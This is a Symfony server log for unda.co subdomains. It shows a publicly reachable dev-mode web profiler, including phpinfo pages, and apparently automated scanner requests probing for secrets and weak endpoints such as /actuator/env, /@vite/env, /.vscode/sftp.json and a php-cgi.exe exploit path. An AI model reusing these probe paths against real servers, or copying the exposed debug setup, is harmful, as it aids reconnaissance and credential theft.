[2025-12-16 10:08:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 10:20:54] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 10:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=request","method":"GET"} []
[2025-12-16 10:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 10:27:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8a2fcc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8a2fcc?panel=security","method":"GET"} []
[2025-12-16 10:27:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 10:30:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"054b2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/054b2f?panel=cache","method":"GET"} []
[2025-12-16 10:30:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 10:32:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=dump","method":"GET"} []
[2025-12-16 10:32:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 10:33:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:40:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?group=1&panel=db","method":"GET"} []
[2025-12-16 10:40:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-16 10:42:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 10:45:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=time","method":"GET"} []
[2025-12-16 10:45:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 10:48:31] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:48:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:48:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:48:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 10:48:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 10:48:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 10:48:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 10:48:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 10:48:32] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 10:48:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:48:51] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:48:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 10:48:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 10:48:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 10:48:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 10:48:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 10:48:51] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 10:48:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=time","method":"GET"} []
[2025-12-16 10:48:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 10:48:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-16 10:48:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:49:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 10:50:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:52:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-16 10:52:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:58:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=cache","method":"GET"} []
[2025-12-16 10:58:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 10:59:46] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 10:59:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 10:59:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 10:59:46] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 10:59:46] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 10:59:46] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 10:59:46] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 11:00:24] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-16 11:01:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?group=1&panel=db","method":"GET"} []
[2025-12-16 11:01:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-16 11:05:15] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:05:15] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
